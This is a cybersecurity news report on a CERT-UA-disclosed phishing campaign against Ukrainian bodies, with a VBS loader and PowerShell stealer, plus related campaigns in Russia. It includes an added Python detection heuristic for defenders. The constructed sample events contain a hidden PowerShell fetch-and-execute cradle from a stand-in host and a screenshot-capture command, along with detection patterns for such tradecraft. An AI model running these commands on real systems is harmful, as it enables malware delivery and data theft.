The Computer Emergency Response Team of Ukraine (CERT-UA) has disclosed that at least three cyber attacks were recorded against state administration bodies and critical infrastructure facilities in the country, with the aim of stealing sensitive data.
The campaign, the agency said, used compromised email accounts to send phishing messages containing links to legitimate file-sharing services such as DropMeFiles and Google Drive. In some cases the links were embedded inside PDF attachments. Because the payloads were hosted on trusted services, the links themselves carry little reputational signal for URL filtering; the sender account and the lure content are the more useful indicators.
The emails sought to create a false sense of urgency by claiming that a Ukrainian government agency planned to cut salaries, urging the recipient to click the link to view the list of affected employees.
Visiting these links leads to the download of a Visual Basic Script (VBS) loader that is designed to fetch and execute a PowerShell script capable of harvesting files matching a specific set of extensions and capturing screenshots.
The activity, attributed to a threat cluster tracked as UAC-0219, is said to have been ongoing since at least fall 2024, with early iterations using a combination of EXE binaries, a VBS stealer, and a legitimate image editor called IrfanView to achieve its goals.
CERT-UA has given the VBS loader and the PowerShell malware the name WRECKSTEEL. The attacks have not been attributed to any country.
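The VBS-loader-to-PowerShell chain described above leaves a characteristic trace in process-creation telemetry: a Windows Script Host process (wscript.exe or cscript.exe) spawning PowerShell, usually with a hidden window and a download cradle on the command line. The following is an added example of a triage heuristic over such events, not CERT-UA's tooling and not based on any published WRECKSTEEL indicators. It assumes Sysmon-style Event ID 1 fields (ParentImage, Image, CommandLine); the indicator patterns are generic PowerShell tradecraft, the threshold of two indicators is an arbitrary choice for the example, and the sample events are constructed, not captured from a real incident.

```python
"""Triage heuristic for a script-host -> PowerShell stealer chain.

Added example, not CERT-UA's code and not WRECKSTEEL indicators.
Assumes Sysmon-style process-creation events; sample events are constructed.
"""
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}

# Generic command-line patterns (assumed indicators, not campaign-specific IOCs):
# a download cradle fetching a second stage, a screenshot via GDI+ from PowerShell,
# and flags that hide the window or pass an encoded/unprofiled command.
DOWNLOAD_CRADLE = re.compile(
    r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|start-bitstransfer", re.I)
SCREENSHOT_API = re.compile(r"copyfromscreen|system\.drawing|graphics\.fromimage", re.I)
HIDDEN_FLAGS = re.compile(
    r"-w(indowstyle)?\s+hidden|-enc(odedcommand)?\b|-nop(rofile)?\b", re.I)

# Constructed Sysmon Event ID 1 records; not real telemetry.
SAMPLE_EVENTS = [
    {"RecordId": 101,
     "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://example.invalid/stage2.ps1')\""},
    {"RecordId": 102,
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-ChildItem C:\\Users\\alice\\Documents"},
    {"RecordId": 103,
     "ParentImage": r"C:\Windows\System32\cscript.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c echo hello"},
    {"RecordId": 104,
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -WindowStyle Hidden -c \"Add-Type -AssemblyName "
                    "System.Drawing; $b = New-Object Drawing.Bitmap 1920,1080; "
                    "[Drawing.Graphics]::FromImage($b).CopyFromScreen(0,0,0,0,$b.Size)\""},
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def indicators(event: dict) -> list:
    """Return the list of indicator names that fire for one process-creation event."""
    found = []
    parent = basename(event["ParentImage"])
    child = basename(event["Image"])
    if parent in SCRIPT_HOSTS and child in POWERSHELL:
        found.append("wsh_spawns_powershell")
    if child in POWERSHELL:
        cmdline = event.get("CommandLine", "")
        if DOWNLOAD_CRADLE.search(cmdline):
            found.append("download_cradle")
        if SCREENSHOT_API.search(cmdline):
            found.append("screenshot_api")
        if HIDDEN_FLAGS.search(cmdline):
            found.append("hidden_or_encoded")
    return found


def triage(events: list, threshold: int = 2) -> dict:
    """Map RecordId -> indicators for events that reach the alert threshold.

    A single indicator (an admin running PowerShell from explorer, say) is too
    noisy on its own; requiring two ties the lure-delivered loader to the
    behaviour of the fetched stage.
    """
    alerts = {}
    for event in events:
        hits = indicators(event)
        if len(hits) >= threshold:
            alerts[event["RecordId"]] = hits
    return alerts


if __name__ == "__main__":
    for record_id, hits in triage(SAMPLE_EVENTS).items():
        print(f"ALERT record {record_id}: {', '.join(hits)}")
```

Run against the constructed events, record 101 (wscript.exe launching a hidden PowerShell download cradle) and record 104 (a hidden PowerShell child calling the GDI+ screenshot API) alert, while the explorer-launched directory listing and the cscript-to-cmd event do not. In a real deployment the command-line patterns would be tuned to the organisation's own PowerShell usage, and the parent-child match alone is usually worth a lower-severity signal even when the threshold is not reached.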
The development comes as Kaspersky warned that the threat actor known as Head Mare has targeted several Russian entities with a malware called PhantomPyramid, which can process instructions issued by the operator over a command-and-control (C2) server, as well as download and run additional payloads such as MeshAgent.
Russian energy companies, industrial enterprises, and suppliers and developers of electronic components have also been on the receiving end of phishing attacks mounted by a threat actor codenamed Unicorn, which dropped a VBS trojan designed to siphon files and images from infected hosts.
Late last month, SEQRITE Labs revealed that academic, governmental, aerospace, and defense-related networks in Russia are being targeted with weaponized decoy documents, likely sent via phishing emails, as part of a campaign dubbed Operation HollowQuill. The attacks are believed to have started around December 2024.
The activity relies on social engineering, disguising malware-laced PDFs as research invitations and government communiqués to entice unsuspecting users into triggering the attack chain.
"The threat entity delivers a malicious RAR file which contains a .NET malware dropper, which further drops a Golang-based shellcode loader along with the legitimate OneDrive application and a decoy-based PDF with a final Cobalt Strike payload," security researcher Subhajeet Singha said.